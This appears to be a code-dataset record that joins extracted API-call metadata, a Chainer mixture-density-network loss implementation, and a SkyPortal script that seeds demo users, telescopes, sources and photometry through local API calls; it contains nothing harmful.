] | [((4091, 4106), 'numpy.ones', 'np.ones', (['numbox'], {}), '(numbox)\n', (4098, 4106), True, 'import numpy as np\n'), ((4116, 4131), 'numpy.ones', 'np.ones', (['numbox'], {}), '(numbox)\n', (4123, 4131), True, 'import numpy as np\n'), ((4893, 4913), 'numpy.maximum', 'np.maximum', (['(0)', '(y - 1)'], {}), '(0, y - 1)\n', (4903, 4913), True, 'import numpy as np\n'), ((4922, 4942), 'numpy.maximum', 'np.maximum', (['(0)', '(x - 1)'], {}), '(0, x - 1)\n', (4932, 4942), True, 'import numpy as np\n'), ((4953, 4975), 'numpy.maximum', 'np.maximum', (['(0)', '(edy - 1)'], {}), '(0, edy - 1)\n', (4963, 4975), True, 'import numpy as np\n'), ((4986, 5008), 'numpy.maximum', 'np.maximum', (['(0)', '(edx - 1)'], {}), '(0, edx - 1)\n', (4996, 5008), True, 'import numpy as np\n'), ((5018, 5039), 'numpy.maximum', 'np.maximum', (['(0)', '(ey - 1)'], {}), '(0, ey - 1)\n', (5028, 5039), True, 'import numpy as np\n'), ((5049, 5070), 'numpy.maximum', 'np.maximum', (['(0)', '(ex - 1)'], {}), '(0, ex - 1)\n', (5059, 5070), True, 'import numpy as np\n'), ((5710, 5732), 'numpy.fix', 'np.fix', (['bboxes[:, 0:4]'], {}), '(bboxes[:, 0:4])\n', (5716, 5732), True, 'import numpy as np\n'), ((5885, 5926), 'numpy.zeros', 'np.zeros', (['(numbox, dst_size, dst_size, 3)'], {}), '((numbox, dst_size, dst_size, 3))\n', (5893, 5926), True, 'import numpy as np\n'), ((1038, 1059), 'numpy.where', 'np.where', (['(score > 0.7)'], {}), '(score > 0.7)\n', (1046, 1059), True, 'import numpy as np\n'), ((3199, 3229), 'numpy.array', 'np.array', (['[bb0, bb1, bb2, bb3]'], {}), '([bb0, bb1, bb2, bb3])\n', (3207, 3229), True, 'import numpy as np\n'), ((3505, 3539), 'numpy.logical_and', 'np.logical_and', (['(tmph > 0)', '(tmpw > 0)'], {}), '(tmph > 0, tmpw > 0)\n', (3519, 3539), True, 'import numpy as np\n'), ((3573, 3619), 'numpy.logical_and', 'np.logical_and', (['(tmp_ys_len > 0)', '(tmp_xs_len > 0)'], {}), '(tmp_ys_len > 0, tmp_xs_len > 0)\n', (3587, 3619), True, 'import numpy as np\n'), ((3653, 3699), 'numpy.logical_and', 'np.logical_and', (['(img_xs_len > 0)', '(img_ys_len > 0)'], {}), '(img_xs_len > 0, img_ys_len > 0)\n', (3667, 3699), True, 'import numpy as np\n'), ((3733, 3799), 'numpy.logical_and', 'np.logical_and', (['(tmp_xs_len == img_xs_len)', '(tmp_ys_len == img_ys_len)'], {}), '(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len)\n', (3747, 3799), True, 'import numpy as np\n'), ((4286, 4302), 'numpy.where', 'np.where', (['(ex > w)'], {}), '(ex > w)\n', (4294, 4302), True, 'import numpy as np\n'), ((4414, 4430), 'numpy.where', 'np.where', (['(ey > h)'], {}), '(ey > h)\n', (4422, 4430), True, 'import numpy as np\n'), ((4542, 4557), 'numpy.where', 'np.where', (['(x < 1)'], {}), '(x < 1)\n', (4550, 4557), True, 'import numpy as np\n'), ((4633, 4653), 'numpy.ones_like', 'np.ones_like', (['x[tmp]'], {}), '(x[tmp])\n', (4645, 4653), True, 'import numpy as np\n'), ((4664, 4679), 'numpy.where', 'np.where', (['(y < 1)'], {}), '(y < 1)\n', (4672, 4679), True, 'import numpy as np\n'), ((4755, 4775), 'numpy.ones_like', 'np.ones_like', (['y[tmp]'], {}), '(y[tmp])\n', (4767, 4775), True, 'import numpy as np\n'), ((4840, 4861), 'numpy.maximum', 'np.maximum', (['(0)', '(dy - 1)'], {}), '(0, dy - 1)\n', (4850, 4861), True, 'import numpy as np\n'), ((4863, 4884), 'numpy.maximum', 'np.maximum', (['(0)', '(dx - 1)'], {}), '(0, dx - 1)\n', (4873, 4884), True, 'import numpy as np\n'), ((5242, 5258), 'numpy.maximum', 'np.maximum', (['w', 'h'], {}), '(w, h)\n', (5252, 5258), True, 'import numpy as np\n'), ((6065, 6096), 'numpy.zeros', 'np.zeros', 
(['(tmp_k_h, tmp_k_w, 3)'], {}), '((tmp_k_h, tmp_k_w, 3))\n', (6073, 6096), True, 'import numpy as np\n'), ((6365, 6402), 'cv2.resize', 'cv2.resize', (['tmp', '(dst_size, dst_size)'], {}), '(tmp, (dst_size, dst_size))\n', (6375, 6402), False, 'import cv2\n'), ((6595, 6608), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6606, 6608), False, 'from collections import OrderedDict\n'), ((5411, 5443), 'numpy.repeat', 'np.repeat', (['[max_side]', '(2)'], {'axis': '(0)'}), '([max_side], 2, axis=0)\n', (5420, 5443), True, 'import numpy as np\n'), ((2172, 2185), 'numpy.sort', 'np.sort', (['peek'], {}), '(peek)\n', (2179, 2185), True, 'import numpy as np\n'), ((7011, 7042), 'numpy.expand_dims', 'np.expand_dims', (['data[i]'], {'axis': '(0)'}), '(data[i], axis=0)\n', (7025, 7042), True, 'import numpy as np\n')] |
import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
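# Custom Chainer function for the mixture-density-network loss: an end-of-stroke Bernoulli term plus a bivariate Gaussian mixture over the (x1, x2) pen offsets.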
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
| [
"chainer.utils.type_check.same_types",
"utils.clip_grad",
"chainer.utils.type_check.expect",
"chainer.cuda.get_array_module"
] | [((583, 1553), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", "(eos_input_type.dtype.kind == 'f')", "(pi_input_type.dtype.kind == 'f')", "(mu_x1_input_type.dtype.kind == 'f')", "(mu_x2_input_type.dtype.kind == 'f')", "(s_x1_input_type.dtype.kind == 'f')", "(s_x2_input_type.dtype.kind == 'f')", "(rho_input_type.dtype.kind == 'f')", '(x_type.ndim >= 2)', '(eos_input_type.ndim >= 2)', '(x_type.shape[0] == eos_input_type.shape[0])', '(x_type.shape[0] == pi_input_type.shape[0])', '(x_type.shape[0] == mu_x1_input_type.shape[0])', '(x_type.shape[0] == mu_x2_input_type.shape[0])', '(x_type.shape[0] == s_x1_input_type.shape[0])', '(x_type.shape[0] == s_x2_input_type.shape[0])', '(x_type.shape[0] == rho_input_type.shape[0])', '(pi_input_type.shape[1] == mu_x1_input_type.shape[1])', '(mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1])', '(mu_x2_input_type.shape[1] == s_x1_input_type.shape[1])', '(s_x1_input_type.shape[1] == s_x2_input_type.shape[1])', '(s_x2_input_type.shape[1] == rho_input_type.shape[1])'], {}), "(x_type.dtype.kind == 'f', eos_input_type.dtype.kind ==\n 'f', pi_input_type.dtype.kind == 'f', mu_x1_input_type.dtype.kind ==\n 'f', mu_x2_input_type.dtype.kind == 'f', s_x1_input_type.dtype.kind ==\n 'f', s_x2_input_type.dtype.kind == 'f', rho_input_type.dtype.kind ==\n 'f', x_type.ndim >= 2, eos_input_type.ndim >= 2, x_type.shape[0] ==\n eos_input_type.shape[0], x_type.shape[0] == pi_input_type.shape[0], \n x_type.shape[0] == mu_x1_input_type.shape[0], x_type.shape[0] ==\n mu_x2_input_type.shape[0], x_type.shape[0] == s_x1_input_type.shape[0],\n x_type.shape[0] == s_x2_input_type.shape[0], x_type.shape[0] ==\n rho_input_type.shape[0], pi_input_type.shape[1] == mu_x1_input_type.\n shape[1], mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1], \n mu_x2_input_type.shape[1] == s_x1_input_type.shape[1], s_x1_input_type.\n shape[1] == s_x2_input_type.shape[1], s_x2_input_type.shape[1] ==\n rho_input_type.shape[1])\n", (600, 1553), False, 'from chainer.utils import type_check\n'), ((2659, 2689), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['*inputs'], {}), '(*inputs)\n', (2680, 2689), False, 'from chainer import cuda\n'), ((5410, 5440), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['*inputs'], {}), '(*inputs)\n', (5431, 5440), False, 'from chainer import cuda\n'), ((7448, 7484), 'utils.clip_grad', 'clip_grad', (['g_eos', 'th_min', 'th_max', 'xp'], {}), '(g_eos, th_min, th_max, xp)\n', (7457, 7484), False, 'from utils import clip_grad\n'), ((7500, 7535), 'utils.clip_grad', 'clip_grad', (['g_pi', 'th_min', 'th_max', 'xp'], {}), '(g_pi, th_min, th_max, xp)\n', (7509, 7535), False, 'from utils import clip_grad\n'), ((7554, 7592), 'utils.clip_grad', 'clip_grad', (['g_mu_x1', 'th_min', 'th_max', 'xp'], {}), '(g_mu_x1, th_min, th_max, xp)\n', (7563, 7592), False, 'from utils import clip_grad\n'), ((7611, 7649), 'utils.clip_grad', 'clip_grad', (['g_mu_x2', 'th_min', 'th_max', 'xp'], {}), '(g_mu_x2, th_min, th_max, xp)\n', (7620, 7649), False, 'from utils import clip_grad\n'), ((7667, 7704), 'utils.clip_grad', 'clip_grad', (['g_s_x1', 'th_min', 'th_max', 'xp'], {}), '(g_s_x1, th_min, th_max, xp)\n', (7676, 7704), False, 'from utils import clip_grad\n'), ((7722, 7759), 'utils.clip_grad', 'clip_grad', (['g_s_x2', 'th_min', 'th_max', 'xp'], {}), '(g_s_x2, th_min, th_max, xp)\n', (7731, 7759), False, 'from utils import clip_grad\n'), ((7776, 7812), 'utils.clip_grad', 'clip_grad', (['g_rho', 'th_min', 'th_max', 'xp'], {}), 
'(g_rho, th_min, th_max, xp)\n', (7785, 7812), False, 'from utils import clip_grad\n'), ((2023, 2053), 'chainer.utils.type_check.same_types', 'type_check.same_types', (['*inputs'], {}), '(*inputs)\n', (2044, 2053), False, 'from chainer.utils import type_check\n')] |
import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
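# Seed a development SkyPortal instance: create tables, demo users and groups, telescopes, instruments, sources, photometry, spectra and thumbnails through the API.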
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
group_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
full_user = User(username="<EMAIL>", role_ids=["Full user"])
view_only_user = User(
username="<EMAIL>", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not response_status == 200 and data["status"] == "success":
raise RuntimeError(
f'API call to {endpoint} failed with status {status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| [
"skyportal.models.User",
"pandas.read_csv",
"baselayer.tools.test_frontend.verify_server_availability",
"datetime.datetime",
"baselayer.app.model_util.create_tables",
"subprocess.Popen",
"skyportal.models.Source.query.get",
"skyportal.models.DBSession",
"skyportal.models.init_db",
"os.getpgid",
"skyportal.model_util.setup_permissions",
"social_tornado.models.TornadoStorage.user.create_social_auth",
"baselayer.app.env.load_env",
"os.path.dirname",
"baselayer.app.model_util.status",
"skyportal.model_util.create_token",
"baselayer.app.model_util.drop_tables",
"os.path.abspath",
"skyportal.tests.api"
] | [((613, 623), 'baselayer.app.env.load_env', 'load_env', ([], {}), '()\n', (621, 623), False, 'from baselayer.app.env import load_env\n'), ((687, 750), 'baselayer.app.model_util.status', 'status', (['f"""Connecting to database {cfg[\'database\'][\'database\']}"""'], {}), '(f"Connecting to database {cfg[\'database\'][\'database\']}")\n', (693, 750), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((760, 786), 'skyportal.models.init_db', 'init_db', ([], {}), "(**cfg['database'])\n", (767, 786), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((797, 826), 'baselayer.app.model_util.status', 'status', (['"""Dropping all tables"""'], {}), "('Dropping all tables')\n", (803, 826), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((836, 849), 'baselayer.app.model_util.drop_tables', 'drop_tables', ([], {}), '()\n', (847, 849), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((860, 885), 'baselayer.app.model_util.status', 'status', (['"""Creating tables"""'], {}), "('Creating tables')\n", (866, 885), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((895, 910), 'baselayer.app.model_util.create_tables', 'create_tables', ([], {}), '()\n', (908, 910), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((991, 1022), 'baselayer.app.model_util.status', 'status', (['f"""Creating permissions"""'], {}), "(f'Creating permissions')\n", (997, 1022), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1032, 1051), 'skyportal.model_util.setup_permissions', 'setup_permissions', ([], {}), '()\n', (1049, 1051), False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((1062, 1093), 'baselayer.app.model_util.status', 'status', (['f"""Creating dummy users"""'], {}), "(f'Creating dummy users')\n", (1068, 1093), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1122, 1172), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Super admin']"}), "(username='<EMAIL>', role_ids=['Super admin'])\n", (1126, 1172), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1222, 1272), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Super admin']"}), "(username='<EMAIL>', role_ids=['Super admin'])\n", (1226, 1272), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1315, 1363), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['Full user']"}), "(username='<EMAIL>', role_ids=['Full user'])\n", (1319, 1363), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1389, 1437), 'skyportal.models.User', 'User', ([], {'username': '"""<EMAIL>"""', 'role_ids': "['View only']"}), "(username='<EMAIL>', role_ids=['View only'])\n", (1393, 1437), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1798, 1822), 'baselayer.app.model_util.status', 'status', (['"""Creating token"""'], {}), "('Creating token')\n", (1804, 1822), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1840, 1980), 'skyportal.model_util.create_token', 'create_token', (["['Manage groups', 'Manage sources', 'Upload data', 'Comment', 'Manage users']", 'super_admin_user.id', '"""load_demo_data token"""'], {}), "(['Manage 
groups', 'Manage sources', 'Upload data', 'Comment',\n 'Manage users'], super_admin_user.id, 'load_demo_data token')\n", (1852, 1980), False, 'from skyportal.model_util import setup_permissions, create_token\n'), ((2189, 2223), 'skyportal.tests.api', 'api', (['"""POST"""', 'endpoint', 'data', 'token'], {}), "('POST', endpoint, data, token)\n", (2192, 2223), False, 'from skyportal.tests import api\n'), ((2460, 2509), 'baselayer.app.model_util.status', 'status', (['"""Launching web app & executing API calls"""'], {}), "('Launching web app & executing API calls')\n", (2466, 2509), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((643, 668), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (658, 668), False, 'import os\n'), ((2560, 2594), 'skyportal.tests.api', 'api', (['"""GET"""', '"""sysinfo"""'], {'token': 'token'}), "('GET', 'sysinfo', token=token)\n", (2563, 2594), False, 'from skyportal.tests import api\n'), ((3008, 3046), 'baselayer.tools.test_frontend.verify_server_availability', 'verify_server_availability', (['server_url'], {}), '(server_url)\n', (3034, 3046), False, 'from baselayer.tools.test_frontend import verify_server_availability\n'), ((1468, 1479), 'skyportal.models.DBSession', 'DBSession', ([], {}), '()\n', (1477, 1479), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((1703, 1773), 'social_tornado.models.TornadoStorage.user.create_social_auth', 'TornadoStorage.user.create_social_auth', (['u', 'u.username', '"""google-oauth2"""'], {}), "(u, u.username, 'google-oauth2')\n", (1741, 1773), False, 'from social_tornado.models import TornadoStorage\n'), ((2740, 2808), 'subprocess.Popen', 'subprocess.Popen', (["['make', 'run']"], {'cwd': 'basedir', 'preexec_fn': 'os.setsid'}), "(['make', 'run'], cwd=basedir, preexec_fn=os.setsid)\n", (2756, 2808), False, 'import subprocess\n'), ((3126, 3171), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy group & adding users"""'], {}), "('Creating dummy group & adding users')\n", (3132, 3171), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((3798, 3834), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy instruments"""'], {}), "('Creating dummy instruments')\n", (3804, 3834), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((5550, 5582), 'baselayer.app.model_util.status', 'status', (['"""Creating dummy sources"""'], {}), "('Creating dummy sources')\n", (5556, 5582), False, 'from baselayer.app.model_util import status, create_tables, drop_tables\n'), ((1670, 1681), 'skyportal.models.DBSession', 'DBSession', ([], {}), '()\n', (1679, 1681), False, 'from skyportal.models import init_db, Base, DBSession, Source, User\n'), ((7117, 7139), 'pandas.read_csv', 'pd.read_csv', (['phot_file'], {}), '(phot_file)\n', (7128, 7139), True, 'import pandas as pd\n'), ((8158, 8180), 'pandas.read_csv', 'pd.read_csv', (['spec_file'], {}), '(spec_file)\n', (8169, 8180), True, 'import pandas as pd\n'), ((9486, 9521), 'skyportal.models.Source.query.get', 'Source.query.get', (["source_info['id']"], {}), "(source_info['id'])\n", (9502, 9521), False, 'from 